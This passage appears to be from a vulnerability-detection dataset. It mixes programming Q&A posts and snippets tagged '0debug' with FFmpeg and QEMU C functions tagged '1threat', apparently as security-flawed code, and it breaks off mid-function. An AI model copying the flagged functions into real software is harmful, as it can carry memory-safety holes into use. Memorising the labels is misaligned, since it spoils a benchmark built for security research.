</code></pre>
<p>I think I have to include a lookup field to achieve this.</p>
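<p>Yes: <code>RetrieveAPIView</code> looks objects up by the attribute named in <code>lookup_field</code> (the pk by default), and by default the URL keyword argument has the same name. A sketch (the UUID regex is illustrative):</p>
<pre><code># views.py
class ProductDetailCustom(generics.RetrieveAPIView):
    queryset = Product.objects.all()
    serializer_class = ProductCustomSerializer
    lookup_field = 'product_id'

# urls.py
url(r'^products/(?P<product_id>[0-9a-f-]+)/$',
    views.ProductDetailCustom.as_view(), name='product-detail'),
</code></pre>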
| 0debug
|
int ff_vdpau_common_end_frame(AVCodecContext *avctx, AVFrame *frame,
struct vdpau_picture_context *pic_ctx)
{
VDPAUContext *vdctx = avctx->internal->hwaccel_priv_data;
AVVDPAUContext *hwctx = avctx->hwaccel_context;
VdpVideoSurface surf = ff_vdpau_get_surface_id(frame);
VdpStatus status;
int val;
val = ff_vdpau_common_reinit(avctx);
if (val < 0)
return val;
#if FF_API_BUFS_VDPAU
FF_DISABLE_DEPRECATION_WARNINGS
hwctx->info = pic_ctx->info;
hwctx->bitstream_buffers = pic_ctx->bitstream_buffers;
hwctx->bitstream_buffers_used = pic_ctx->bitstream_buffers_used;
hwctx->bitstream_buffers_allocated = pic_ctx->bitstream_buffers_allocated;
FF_ENABLE_DEPRECATION_WARNINGS
#endif
if (!hwctx->render) {
status = hwctx->render2(avctx, frame, (void *)&pic_ctx->info,
pic_ctx->bitstream_buffers_used, pic_ctx->bitstream_buffers);
} else
status = vdctx->render(vdctx->decoder, surf, (void *)&pic_ctx->info,
pic_ctx->bitstream_buffers_used,
pic_ctx->bitstream_buffers);
av_freep(&pic_ctx->bitstream_buffers);
#if FF_API_BUFS_VDPAU
FF_DISABLE_DEPRECATION_WARNINGS
hwctx->bitstream_buffers = NULL;
hwctx->bitstream_buffers_used = 0;
hwctx->bitstream_buffers_allocated = 0;
FF_ENABLE_DEPRECATION_WARNINGS
#endif
return vdpau_error(status);
}
| 1threat
|
static int load_input_picture(MpegEncContext *s, AVFrame *pic_arg){
AVFrame *pic=NULL;
int i;
const int encoding_delay= s->max_b_frames;
int direct=1;
if(pic_arg){
if(encoding_delay && !(s->flags&CODEC_FLAG_INPUT_PRESERVED)) direct=0;
if(pic_arg->linesize[0] != s->linesize) direct=0;
if(pic_arg->linesize[1] != s->uvlinesize) direct=0;
if(pic_arg->linesize[2] != s->uvlinesize) direct=0;
if(direct){
i= find_unused_picture(s, 1);
pic= (AVFrame*)&s->picture[i];
pic->reference= 3;
for(i=0; i<4; i++){
pic->data[i]= pic_arg->data[i];
pic->linesize[i]= pic_arg->linesize[i];
}
alloc_picture(s, (Picture*)pic, 1);
}else{
i= find_unused_picture(s, 0);
pic= (AVFrame*)&s->picture[i];
pic->reference= 3;
alloc_picture(s, (Picture*)pic, 0);
for(i=0; i<4; i++){
pic->data[i]+= 16;
}
if( pic->data[0] == pic_arg->data[0]
&& pic->data[1] == pic_arg->data[1]
&& pic->data[2] == pic_arg->data[2]){
}else{
int h_chroma_shift, v_chroma_shift;
avcodec_get_chroma_sub_sample(s->avctx->pix_fmt, &h_chroma_shift, &v_chroma_shift);
for(i=0; i<3; i++){
int src_stride= pic_arg->linesize[i];
int dst_stride= i ? s->uvlinesize : s->linesize;
int h_shift= i ? h_chroma_shift : 0;
int v_shift= i ? v_chroma_shift : 0;
int w= s->width >>h_shift;
int h= s->height>>v_shift;
uint8_t *src= pic_arg->data[i];
uint8_t *dst= pic->data[i];
if(src_stride==dst_stride)
memcpy(dst, src, src_stride*h);
else{
while(h--){
memcpy(dst, src, w);
dst += dst_stride;
src += src_stride;
}
}
}
}
}
pic->quality= pic_arg->quality;
pic->pict_type= pic_arg->pict_type;
pic->pts = pic_arg->pts;
if(s->input_picture[encoding_delay])
pic->display_picture_number= s->input_picture[encoding_delay]->display_picture_number + 1;
}
for(i=1; i<MAX_PICTURE_COUNT ; i++)
s->input_picture[i-1]= s->input_picture[i];
s->input_picture[encoding_delay]= (Picture*)pic;
return 0;
}
| 1threat
|
Please help me optimise this SQL function :
(@PaymentId int)
returns int
as
begin
Declare @viewedCount int
Select @viewedCount=Count(OtSrno) From OtTendersViewDetail
Where OTPaymentId=@PaymentId And OTPaymentId is not null
return (@viewedCount)
end
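Scalar user-defined functions like this are evaluated row by row, which is often the real cost; two things that usually help are an index on OTPaymentId and rewriting it as an inline table-valued function so the optimiser can fold it into the calling query. A sketch (the function name and the usage table are illustrative):

    CREATE FUNCTION dbo.GetViewedCount (@PaymentId int)
    RETURNS TABLE
    AS
    RETURN
    (
        SELECT COUNT(OtSrno) AS ViewedCount
        FROM   OtTendersViewDetail
        WHERE  OTPaymentId = @PaymentId
    );

    -- usage from a query:
    -- SELECT t.*, vc.ViewedCount
    -- FROM   SomeTable t
    -- CROSS APPLY dbo.GetViewedCount(t.PaymentId) vc;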
| 0debug
|
Can I change the title bar of Sublime Text to black, like Brackets? : <p>How can I change the title bar of Sublime Text to look like this image? An all-black finish!</p>
<p><a href="https://i.stack.imgur.com/uGx7P.jpg" rel="noreferrer"><img src="https://i.stack.imgur.com/uGx7P.jpg" alt="enter image description here"></a></p>
| 0debug
|
def find_Min_Sum(a, b, n):
    a.sort()
    b.sort()
    sum = 0
    for i in range(n):
        sum = sum + abs(a[i] - b[i])
    return sum
| 0debug
|
Java code not working? (FileInputStream, StringTokenizer, String to primitive type conversion) : My code is just not working. The text file is in the same folder as my classes. Using the full pathname worked, but I don't think that would work if I sent the file to someone else. Converting the Strings to primitive types using the parse methods isn't working either. I'm not sure what I'm doing wrong; can anyone help? Here is my code:
import java.util.Scanner;
import java.util.StringTokenizer;
import java.io.FileNotFoundException;
import java.io.FileInputStream;

public class TestInventory {

    public static void main(String[] args) {
        // TODO Auto-generated method stub
        Inventory movieList = new Inventory();
        Scanner inputStream = null;
        try {
            inputStream = new Scanner(new FileInputStream("movies_db.txt"));
        }
        catch (FileNotFoundException e) {
            System.out.println("File not found or could not be opened");
            System.exit(0);
        }
        while (inputStream.hasNextLine()) {
            String s = inputStream.nextLine();
            StringTokenizer st = new StringTokenizer(s, " - ");
            String t1 = st.nextToken();
            String t2 = st.nextToken();
            String t3 = st.nextToken();
            String t4 = st.nextToken();
            int y = Integer.parseInt(t2);
            double r = Double.parseDouble(t4);
            int d = Integer.parseInt(t3);
            Movie m = new Movie(t1, y, r, d);
            movieList.addMovie(m);
        }
|
static void g364fb_update_display(void *opaque)
{
G364State *s = opaque;
if (s->width == 0 || s->height == 0)
return;
if (s->width != ds_get_width(s->ds) || s->height != ds_get_height(s->ds)) {
qemu_console_resize(s->ds, s->width, s->height);
}
if (s->ctla & CTLA_FORCE_BLANK) {
g364fb_draw_blank(s);
} else if (s->depth == 8) {
g364fb_draw_graphic8(s);
} else {
error_report("g364: unknown guest depth %d", s->depth);
}
qemu_irq_raise(s->irq);
}
| 1threat
|
Could you please help me show the comment elements in the dish using ng-repeat? : I want to show all the comment elements as a list using "ng-repeat" and "ng-controller", but I don't know how to show the comment elements inside the dish!
Like this:<br>
5 stars<br>
Imagine all the eatables, living in conFusion!<br>
John Lemon,oct. 17,2012
<script>
var app = angular.module('confusionApp',[]);
app.controller('dishDetailController', function() {
this.filtText= '';
var dish=[
{
name:'Uthapizza',
image: 'images/uthapizza.png',
category: 'mains',
lable:'Hot',
price:'4.99',
description:'A unique combination of Indian Uthappam (pancake) and Italian pizza, topped with Cerignola olives, ripe vine cherry tomatoes, Vidalia onion, Guntur chillies and Buffalo Paneer.',
comments: [
{
rating:5,
comment:"Imagine all the eatables, living in conFusion!",
author:"John Lemon",
date:"2012-10-16T17:57:28.556094Z"
},
{
rating:4,
comment:"Sends anyone to heaven, I wish I could get my mother-in-law to eat it!",
author:"Paul McVites",
date:"2014-09-05T17:57:28.556094Z"
},
{
rating:3,
comment:"Eat it, just eat it!",
author:"Michael Jaikishan",
date:"2015-02-13T17:57:28.556094Z"
},
{
rating:4,
comment:"Ultimate, Reaching for the stars!",
author:"Ringo Starry",
date:"2013-12-02T17:57:28.556094Z"
},
{
rating:2,
comment:"It's your birthday, we're gonna party!",
author:"25 Cent",
date:"2011-12-02T17:57:28.556094Z"
}
]
}];
this.dish = dish;
});
</script>
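A minimal sketch of the markup, assuming ng-app="confusionApp" is set on a parent element and using the "controller as" syntax (note the controller stores a one-element array, hence dish[0]):

    <div ng-controller="dishDetailController as dishCtrl">
        <ul>
            <li ng-repeat="comment in dishCtrl.dish[0].comments">
                {{comment.rating}} stars<br>
                {{comment.comment}}<br>
                {{comment.author}}, {{comment.date | date:'mediumDate'}}
            </li>
        </ul>
    </div>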
| 0debug
|
static unsigned int dec10_quick_imm(DisasContext *dc)
{
int32_t imm, simm;
int op;
imm = dc->ir & ((1 << 6) - 1);
simm = (int8_t) (imm << 2);
simm >>= 2;
switch (dc->opcode) {
case CRISV10_QIMM_BDAP_R0:
case CRISV10_QIMM_BDAP_R1:
case CRISV10_QIMM_BDAP_R2:
case CRISV10_QIMM_BDAP_R3:
simm = (int8_t)dc->ir;
LOG_DIS("bdap %d $r%d\n", simm, dc->dst);
LOG_DIS("pc=%x mode=%x quickimm %d r%d r%d\n",
dc->pc, dc->mode, dc->opcode, dc->src, dc->dst);
cris_set_prefix(dc);
if (dc->dst == 15) {
tcg_gen_movi_tl(cpu_PR[PR_PREFIX], dc->pc + 2 + simm);
} else {
tcg_gen_addi_tl(cpu_PR[PR_PREFIX], cpu_R[dc->dst], simm);
}
break;
case CRISV10_QIMM_MOVEQ:
LOG_DIS("moveq %d, $r%d\n", simm, dc->dst);
cris_cc_mask(dc, CC_MASK_NZVC);
cris_alu(dc, CC_OP_MOVE, cpu_R[dc->dst],
cpu_R[dc->dst], tcg_const_tl(simm), 4);
break;
case CRISV10_QIMM_CMPQ:
LOG_DIS("cmpq %d, $r%d\n", simm, dc->dst);
cris_cc_mask(dc, CC_MASK_NZVC);
cris_alu(dc, CC_OP_CMP, cpu_R[dc->dst],
cpu_R[dc->dst], tcg_const_tl(simm), 4);
break;
case CRISV10_QIMM_ADDQ:
LOG_DIS("addq %d, $r%d\n", imm, dc->dst);
cris_cc_mask(dc, CC_MASK_NZVC);
cris_alu(dc, CC_OP_ADD, cpu_R[dc->dst],
cpu_R[dc->dst], tcg_const_tl(imm), 4);
break;
case CRISV10_QIMM_ANDQ:
LOG_DIS("andq %d, $r%d\n", simm, dc->dst);
cris_cc_mask(dc, CC_MASK_NZVC);
cris_alu(dc, CC_OP_AND, cpu_R[dc->dst],
cpu_R[dc->dst], tcg_const_tl(simm), 4);
break;
case CRISV10_QIMM_ASHQ:
LOG_DIS("ashq %d, $r%d\n", simm, dc->dst);
cris_cc_mask(dc, CC_MASK_NZVC);
op = imm & (1 << 5);
imm &= 0x1f;
if (op) {
cris_alu(dc, CC_OP_ASR, cpu_R[dc->dst],
cpu_R[dc->dst], tcg_const_tl(imm), 4);
} else {
cris_update_cc_op(dc, CC_OP_FLAGS, 4);
gen_helper_btst(cpu_PR[PR_CCS], cpu_R[dc->dst],
tcg_const_tl(imm), cpu_PR[PR_CCS]);
}
break;
case CRISV10_QIMM_LSHQ:
LOG_DIS("lshq %d, $r%d\n", simm, dc->dst);
op = CC_OP_LSL;
if (imm & (1 << 5)) {
op = CC_OP_LSR;
}
imm &= 0x1f;
cris_cc_mask(dc, CC_MASK_NZVC);
cris_alu(dc, op, cpu_R[dc->dst],
cpu_R[dc->dst], tcg_const_tl(imm), 4);
break;
case CRISV10_QIMM_SUBQ:
LOG_DIS("subq %d, $r%d\n", imm, dc->dst);
cris_cc_mask(dc, CC_MASK_NZVC);
cris_alu(dc, CC_OP_SUB, cpu_R[dc->dst],
cpu_R[dc->dst], tcg_const_tl(imm), 4);
break;
case CRISV10_QIMM_ORQ:
LOG_DIS("andq %d, $r%d\n", simm, dc->dst);
cris_cc_mask(dc, CC_MASK_NZVC);
cris_alu(dc, CC_OP_OR, cpu_R[dc->dst],
cpu_R[dc->dst], tcg_const_tl(simm), 4);
break;
case CRISV10_QIMM_BCC_R0:
if (!dc->ir) {
cpu_abort(dc->env, "opcode zero\n");
}
case CRISV10_QIMM_BCC_R1:
case CRISV10_QIMM_BCC_R2:
case CRISV10_QIMM_BCC_R3:
imm = dc->ir & 0xff;
if (imm & 1) {
imm |= 0xffffff00;
imm &= ~1;
}
imm += 2;
LOG_DIS("b%s %d\n", cc_name(dc->cond), imm);
cris_cc_mask(dc, 0);
cris_prepare_cc_branch(dc, imm, dc->cond);
break;
default:
LOG_DIS("pc=%x mode=%x quickimm %d r%d r%d\n",
dc->pc, dc->mode, dc->opcode, dc->src, dc->dst);
cpu_abort(dc->env, "Unhandled quickimm\n");
break;
}
return 2;
}
| 1threat
|
Is it possible to prioritise a lock? : <p>I have a <code>multiprocessing</code> program where</p>
<ul>
<li>one process adds elements to a shared list (<code>multiprocessing.Manager().list()</code>)</li>
<li>several other processes consume these elements from that list (and remove them); they run until there is something to process in the list and the process above is still adding to the list.</li>
</ul>
<p>I implemented locking (via <code>multiprocessing.Lock()</code>) when adding to the list, or removing from it. Since there is one "feeder" process and several (10-40) "consumer" ones all competing for the lock, and that the consumer processes are fast, I end up with the "feeder" process having a hard time acquiring the lock.</p>
<p><strong>Is there a concept of "priority" when acquiring a lock?</strong> I would like the "feeder" process to acquire it with more priority than the others.</p>
<p>Right now I mitigated the issue by having the "consumer" processes wait a random time before trying to acquire the lock while the "feeder" process is there (when it ends it sets a flag). This is a workaround which works but it is ugly and hardly effective (I have the processes wait <code>random.random()*n</code> seconds, where <code>n</code> is the number of processes. This is a completely made up number, probably wrong). </p>
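<p>For reference, a minimal sketch of one arrangement that might work (all names here are made up): the feeder sets an extra Event before asking for the lock, and the consumers back off while that Event is set, so the feeder effectively gets priority without any timing tricks.</p>
<pre><code>import multiprocessing as mp
import time

def feeder(items, lock, feeder_waiting, done):
    for i in range(100):                      # stand-in for the real producer
        feeder_waiting.set()                  # ask consumers to back off
        with lock:
            items.append(i)
        feeder_waiting.clear()
    done.set()

def consumer(items, lock, feeder_waiting, done):
    while True:
        if feeder_waiting.is_set():           # give way to the feeder
            time.sleep(0.001)
            continue
        with lock:
            item = items.pop(0) if len(items) else None
        if item is None:
            if done.is_set():
                break                         # feeder finished and list drained
            time.sleep(0.001)
            continue
        # ... process item ...

if __name__ == "__main__":
    mgr = mp.Manager()
    items = mgr.list()
    lock = mp.Lock()
    feeder_waiting = mp.Event()
    done = mp.Event()
    procs = [mp.Process(target=feeder, args=(items, lock, feeder_waiting, done))]
    procs += [mp.Process(target=consumer, args=(items, lock, feeder_waiting, done))
              for _ in range(4)]
    for p in procs:
        p.start()
    for p in procs:
        p.join()
</code></pre>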
| 0debug
|
def Find_Max(lst):
maxList = max((x) for x in lst)
return maxList
| 0debug
|
Delphi please let me know why my filter not work : test := TFDMemTable.Create(nil);
test.CopyDataSet(TempUnplannedDemand, [coStructure, coRestart, coAppend]);
test.First;
while not test.Eof do
begin
ShowMessage(DateTimeToStr(test.FieldByName('demand_date').AsDateTime) +
' - ' +
IntToStr(test.FieldByName('level').AsInteger));
test.Next;
end;
will show
24/03/2017 - 1
24/03/2017 - 0
24/03/2017 - 1
24/03/2017 - 1
test.IndexFieldNames := 'level';
//test.SetRangeStart;
//test.FieldByName('level').AsInteger := 0;
//test.SetRangeEnd;
//test.FieldByName('level').AsInteger := 0;
//test.ApplyRange;
//test.SetRange([0],[0]);
test.Filter := 'level=0';
test.Filtered := True;
test.First;
while not test.Eof do
begin
ShowMessage(DateTimeToStr(test.FieldByName('demand_date').AsDateTime) +
' - ' +
IntToStr(test.FieldByName('level').AsInteger));
test.Next;
end;
will show
24/03/2017 - 1
24/03/2017 - 0
24/03/2017 - 1
24/03/2017 - 1
why test.Filter := 'level=0'; don't work
Please help me.
| 0debug
|
Python TypeError: 'NoneType' object is not subscriptable only showing on second iteration? : I am getting a really weird error. The function Choose_units() is called in a loop. It works the first time it is called but gives this error the second time. The error is on the line "units_used = UNITS.get(current_units)[0] "
I used some checks before the line and it shows that current_units != None. We were asked to use current_units as a global variable in the assignment.
I used some checks before the line and it shows that current_units != None. But it still displays the same error and for some reason not on the first iteration.
while True:
print_menu();
try:
choice = int(input("What is your choice?: "));
except:
print("Please enter an integer only");
continue;
if choice == 1:
Process_a_new_data_file(current_set);
elif choice == 2:
Choose_units();
def Choose_units():
global current_units
if current_units is not None:
print("a")
print(current_units)
units_used = UNITS.get(current_units)[0]
print("Current units in " + units_used)
print("Choose new units:\n")
for i in UNITS:
print(str(i) + " - " + UNITS[i][0])
while True:
current_units = input("Which unit?\n")
for i in UNITS:
if(int(current_units) == i):
return
print("Please choose a unit from the list")
continue
It should work without showing the error.
My sample run:
Main Menu
---------
1 - Process a new data file
2 - Choose units
3 - Edit room filter
4 - Show summary statistics
5 -Show temperature by date and time
6 -Show histogram of temperatures
7 - Quit
What is your choice?: 2
a
0
Current units in Celsius
Choose new units:
0 - Celsius
1 - Fahrenheit
2 - Kelvin
5 - Rankine
Which unit?
1
Main Menu
---------
1 - Process a new data file
2 - Choose units
3 - Edit room filter
4 - Show summary statistics
5 -Show temperature by date and time
6 -Show histogram of temperatures
7 - Quit
What is your choice?: 2
a
1
Traceback (most recent call last):
File "Assignment9.py", line 274, in <module>
main()
File "Assignment9.py", line 253, in main
Choose_units();
File "Assignment9.py", line 79, in Choose_units
units_used = UNITS.get(current_units)[0]
TypeError: 'NoneType' object is not subscriptable
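A minimal reproduction of what seems to be happening (the UNITS values here are placeholders): input() returns a string, so after the first call current_units holds the string "1" instead of the int 1, UNITS.get("1") returns None, and indexing None raises exactly this TypeError on the next call. Converting right after reading keeps the global an int:
UNITS = {0: ("Celsius",), 1: ("Fahrenheit",), 2: ("Kelvin",), 5: ("Rankine",)}
current_units = 0
def Choose_units():
    global current_units
    print("Current units in " + UNITS[current_units][0])
    for code in UNITS:
        print(str(code) + " - " + UNITS[code][0])
    while True:
        choice = input("Which unit?\n")
        if choice.isdigit() and int(choice) in UNITS:
            current_units = int(choice)   # store the int, not the string
            return
        print("Please choose a unit from the list")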
| 0debug
|
Rxjs One Observable Feeding into Another : <p>I have a rather clunky looking set of code where the data from one observable is fed into another, like so:</p>
<pre><code>let source = this.myService.getFoo()
.subscribe(result => {
let source2 = this.myService.getMoo(result)
.subscribe(result2 => { // do stuff });
});
</code></pre>
<p>I know that there are ways to combine and chain, but I need data from source to be fed into source2. The nesting of subscribes looks terrible and I'm pretty certain there is a better way to do this.</p>
<p>Thanks!</p>
| 0debug
|
docker container does not need an OS, but each container has one. Why? : <p>"docker" is a buzzword these days and I'm trying to figure out what it is and how it works. And more specifically, how is it different from a normal VM (e.g. VirtualBox, Hyper-V or VMware solutions).</p>
<p>The introduction section of the documentation (<a href="https://docs.docker.com/get-started/#a-brief-explanation-of-containers" rel="noreferrer">https://docs.docker.com/get-started/#a-brief-explanation-of-containers</a>) reads:</p>
<blockquote>
<p>Containers run apps natively on the host machine’s kernel. They have better performance characteristics than virtual machines that only get virtual access to host resources through a hypervisor. Containers can get native access, each one running in a discrete process, taking no more memory than any other executable.</p>
</blockquote>
<p>Bingo! Here is the difference. Containers run directly on the kernel of hosting OS, this is why they are so lightweight and fast (plus they provide isolation of processes and nice distribution mechanism in the shape of docker hub, which plays well with the ability to connect containers with each other).</p>
<p>But wait a second. I can run Linux applications on windows using docker - how can it be? Sure, there is some VM. Otherwise we would just not get job done...</p>
<p>OK, but how does it look like, when we work on Linux host??? And here comes real confusion... there one still defines OS as a base image for every image we want to create. Even if we say "FROM scratch" - scratch is still some minimalistic kernel... So here comes</p>
<p><strong>QUESTION 1</strong>: If I run e.g. CentOS host, can I create the container, which would directly use kernel of this host operating system (and not VM, which includes its own OS)? If yes, how can I do it? If no, why the documentaion of docker lies to us (as then docker images always run within some VM and it is not too much different from other VMs, or ist it?)?</p>
<p>After some thinking about it and looking around I was wondering, if some optimization is done for running the images. Here comes</p>
<p><strong>QUESTION 2</strong>: If I run two containers, images of both of which are based on the same parent image, will this parent image be loaded into memory only once? Will there be one VM for each container or just one, which runs both containers? And what if we use different OSs?</p>
<p>The third question is quite beaten:</p>
<p><strong>QUESTION 3</strong>: Are there somewhere some resources, which describe this kind of things... because most of the articles, which discuss docker just tell "it is so cool, you must definitely use ut. Just run one command and be happy"... which does not explain too much.</p>
<p>Thanks.</p>
| 0debug
|
How to register multiple beans using single @Bean-annotated method (or similar) in Spring? : <p>I have a class similar to the following:</p>
<pre><code>@Configuration
public class ApplicationConfiguration {
private <T> T createService(Class<T> serviceInterface) {
// implementation omitted
}
@Bean
public FooService fooService() {
return createService(FooService.class);
}
@Bean
public BarService barService() {
return createService(BarService.class);
}
...
}
</code></pre>
<p>The problem is that there are too many @Bean-annotated methods which differ only in their names, return types and arguments for the <code>createService</code> method call.
I would like to make this class similar to the following:</p>
<pre><code>@Configuration
public class ApplicationConfiguration {
private static final Class<?>[] SERVICE_INTERFACES = {
FooSerivce.class, BarService.class, ...};
private <T> T createService(Class<T> serviceInterface) {
// implementation omitted
}
@Beans // whatever
public Map<String, Object> serviceBeans() {
Map<String, Object> result = ...
for (Class<?> serviceInterface : SERVICE_INTERFACES) {
result.put(/* calculated bean name */,
createService(serviceInterface));
}
return result;
}
}
</code></pre>
<p>Is it possible in Spring?</p>
| 0debug
|
Java GregorianCalendar check if a day is between other two : <p>Let's say I have two GregorianCalendar dates with the year, the month and the day from the month and they give me another GregorianCalendar date.</p>
<p>Is there a defined method to check if the given date is between the other two dates?</p>
<p>If not, would I need to start comparing the years, then the months and finally the day?</p>
| 0debug
|
jQuery sliding divs and changing button : Hello
I have a footer slide toggle function, and I want the button to change between an up button and a down button.
Please read the code below and you will see what I want.
<!-- begin snippet: js hide: false console: true babel: false -->
<!-- language: lang-js -->
$(".footer").click(function () {
$footer = $(this);
//getting the prev element
$content = $footer.prev();
$button = $footer.find("td");
//open up the content needed - toggle the slide- if visible, slide up, if not slidedown.
$content.slideToggle(500, function () {
//execute this after slideToggle is done
//change text of header based on visibility of content div
return $content.is(":visible") ? $button.attr("up","down") : $button.attr("down","up");
});
});
<!-- language: lang-html -->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js"></script>
<div class="infobar">
<table class="content">
content
</table>
<table class="footer">
<td class="up" style=" padding-top: 7px; padding-bottom: 7px;" >
</td>
</table>
</div>
<!-- end snippet -->
Demo: http://jsfiddle.net/HAQyK/1652/
How can I solve it?
- List item
| 0debug
|
this code was supposed to loop, and when the input was invalid it should have asked for the information again and again, but it doesn't : while True:
for i in text:
print (ord(i))
print (i , "=" , chr (ord(i) +n))
password = (password + chr (ord(i) + n))
if (text.lower() != text):
print ("only lower case.")
elif (n<2 or n>15):
print ("your code must be between 2 and 15, including them.")
return False
else:
print(text , "=>" , password)
| 0debug
|
static void tcg_s390_program_interrupt(CPUS390XState *env, uint32_t code,
int ilen)
{
#ifdef CONFIG_TCG
trigger_pgm_exception(env, code, ilen);
cpu_loop_exit(CPU(s390_env_get_cpu(env)));
#else
g_assert_not_reached();
#endif
}
| 1threat
|
Force singlethreading in form application (.NET 4.5) : I recently created a form application through the Windows Form Application template in Visual Studio. The program was automatically created with multiple threads, putting the UI on one thread and whatever else on the other thread (I think).
Regardless I ran into and fixed the issue described [here][1]
What I want to know is how to manipulate the program to run everything on a single thread so that I do not have to worry about adding the extra code to manipulate UI objects, or do I not have a choice?
For reference, the code where I ran into this issue was in the main Form class.
[1]: http://stackoverflow.com/a/244614
| 0debug
|
How to assign value inside a Runnable Thread : <p>I have the next code:</p>
<pre><code> for(int i = 0; i < fileRefernces.size(); i++) {
Thread t = new Thread(new Runnable() {
public void run() {
JLabel pageNumber = new JLabel("<html><font color='#003b86'>PAGE" + (i + 1) + "</font></html>", JLabel.LEFT);
JLabel imageLabel = new JLabel(image, JLabel.LEFT);
// content would be probably some Image class or byte[]
// or:
// InputStream in = Loc.openStream();
// read image from in
}
});
}
</code></pre>
<p>But, just at the moment to assign the value, I get the next error:</p>
<blockquote>
<p>error: local variables referenced from an inner class must be final or
effectively final</p>
</blockquote>
<p>How can I assign values to those variables?</p>
| 0debug
|
static int filter_frame(AVFilterLink *inlink, AVFilterBufferRef *insamples)
{
AVFilterContext *ctx = inlink->dst;
AVFilterLink *outlink = ctx->outputs[0];
ShowWavesContext *showwaves = ctx->priv;
const int nb_samples = insamples->audio->nb_samples;
AVFilterBufferRef *outpicref = showwaves->outpicref;
int linesize = outpicref ? outpicref->linesize[0] : 0;
int16_t *p = (int16_t *)insamples->data[0];
int nb_channels = av_get_channel_layout_nb_channels(insamples->audio->channel_layout);
int i, j, h;
const int n = showwaves->n;
const int x = 255 / (nb_channels * n);
for (i = 0; i < nb_samples; i++) {
if (!outpicref) {
showwaves->outpicref = outpicref =
ff_get_video_buffer(outlink, AV_PERM_WRITE|AV_PERM_ALIGN,
outlink->w, outlink->h);
if (!outpicref)
return AVERROR(ENOMEM);
outpicref->video->w = outlink->w;
outpicref->video->h = outlink->h;
outpicref->pts = insamples->pts +
av_rescale_q((p - (int16_t *)insamples->data[0]) / nb_channels,
(AVRational){ 1, inlink->sample_rate },
outlink->time_base);
linesize = outpicref->linesize[0];
memset(outpicref->data[0], 0, showwaves->h*linesize);
}
for (j = 0; j < nb_channels; j++) {
h = showwaves->h/2 - av_rescale(*p++, showwaves->h/2, MAX_INT16);
if (h >= 0 && h < outlink->h)
*(outpicref->data[0] + showwaves->buf_idx + h * linesize) += x;
}
showwaves->sample_count_mod++;
if (showwaves->sample_count_mod == n) {
showwaves->sample_count_mod = 0;
showwaves->buf_idx++;
}
if (showwaves->buf_idx == showwaves->w)
push_frame(outlink);
outpicref = showwaves->outpicref;
}
avfilter_unref_buffer(insamples);
return 0;
}
| 1threat
|
static av_cold int XAVS_init(AVCodecContext *avctx)
{
XavsContext *x4 = avctx->priv_data;
x4->sei_size = 0;
xavs_param_default(&x4->params);
x4->params.pf_log = XAVS_log;
x4->params.p_log_private = avctx;
x4->params.i_keyint_max = avctx->gop_size;
if (avctx->bit_rate) {
x4->params.rc.i_bitrate = avctx->bit_rate / 1000;
x4->params.rc.i_rc_method = XAVS_RC_ABR;
}
x4->params.rc.i_vbv_buffer_size = avctx->rc_buffer_size / 1000;
x4->params.rc.i_vbv_max_bitrate = avctx->rc_max_rate / 1000;
x4->params.rc.b_stat_write = avctx->flags & AV_CODEC_FLAG_PASS1;
if (avctx->flags & AV_CODEC_FLAG_PASS2) {
x4->params.rc.b_stat_read = 1;
} else {
if (x4->crf >= 0) {
x4->params.rc.i_rc_method = XAVS_RC_CRF;
x4->params.rc.f_rf_constant = x4->crf;
} else if (x4->cqp >= 0) {
x4->params.rc.i_rc_method = XAVS_RC_CQP;
x4->params.rc.i_qp_constant = x4->cqp;
}
}
if (x4->aud >= 0)
x4->params.b_aud = x4->aud;
if (x4->mbtree >= 0)
x4->params.rc.b_mb_tree = x4->mbtree;
if (x4->direct_pred >= 0)
x4->params.analyse.i_direct_mv_pred = x4->direct_pred;
if (x4->fast_pskip >= 0)
x4->params.analyse.b_fast_pskip = x4->fast_pskip;
if (x4->motion_est >= 0)
x4->params.analyse.i_me_method = x4->motion_est;
if (x4->mixed_refs >= 0)
x4->params.analyse.b_mixed_references = x4->mixed_refs;
if (x4->b_bias != INT_MIN)
x4->params.i_bframe_bias = x4->b_bias;
if (x4->cplxblur >= 0)
x4->params.rc.f_complexity_blur = x4->cplxblur;
#if FF_API_MOTION_EST
FF_DISABLE_DEPRECATION_WARNINGS
if (x4->motion_est < 0) {
switch (avctx->me_method) {
case ME_EPZS:
x4->params.analyse.i_me_method = XAVS_ME_DIA;
break;
case ME_HEX:
x4->params.analyse.i_me_method = XAVS_ME_HEX;
break;
case ME_UMH:
x4->params.analyse.i_me_method = XAVS_ME_UMH;
break;
case ME_FULL:
x4->params.analyse.i_me_method = XAVS_ME_ESA;
break;
case ME_TESA:
x4->params.analyse.i_me_method = XAVS_ME_TESA;
break;
default:
x4->params.analyse.i_me_method = XAVS_ME_HEX;
}
}
FF_ENABLE_DEPRECATION_WARNINGS
#endif
x4->params.i_bframe = avctx->max_b_frames;
x4->params.b_cabac = 0;
x4->params.i_bframe_adaptive = avctx->b_frame_strategy;
avctx->has_b_frames = !!avctx->max_b_frames;
x4->params.i_keyint_min = avctx->keyint_min;
if (x4->params.i_keyint_min > x4->params.i_keyint_max)
x4->params.i_keyint_min = x4->params.i_keyint_max;
x4->params.i_scenecut_threshold = avctx->scenechange_threshold;
x4->params.rc.i_qp_min = avctx->qmin;
x4->params.rc.i_qp_max = avctx->qmax;
x4->params.rc.i_qp_step = avctx->max_qdiff;
x4->params.rc.f_qcompress = avctx->qcompress;
x4->params.rc.f_qblur = avctx->qblur;
x4->params.i_frame_reference = avctx->refs;
x4->params.i_width = avctx->width;
x4->params.i_height = avctx->height;
x4->params.vui.i_sar_width = avctx->sample_aspect_ratio.num;
x4->params.vui.i_sar_height = avctx->sample_aspect_ratio.den;
x4->params.i_fps_num = avctx->time_base.den;
x4->params.i_fps_den = avctx->time_base.num;
x4->params.analyse.inter = XAVS_ANALYSE_I8x8 |XAVS_ANALYSE_PSUB16x16| XAVS_ANALYSE_BSUB16x16;
x4->params.analyse.i_me_range = avctx->me_range;
x4->params.analyse.i_subpel_refine = avctx->me_subpel_quality;
x4->params.analyse.b_chroma_me = avctx->me_cmp & FF_CMP_CHROMA;
x4->params.analyse.b_transform_8x8 = 1;
x4->params.analyse.i_trellis = avctx->trellis;
x4->params.analyse.i_noise_reduction = avctx->noise_reduction;
if (avctx->level > 0)
x4->params.i_level_idc = avctx->level;
if (avctx->bit_rate > 0)
x4->params.rc.f_rate_tolerance =
(float)avctx->bit_rate_tolerance / avctx->bit_rate;
if ((avctx->rc_buffer_size) &&
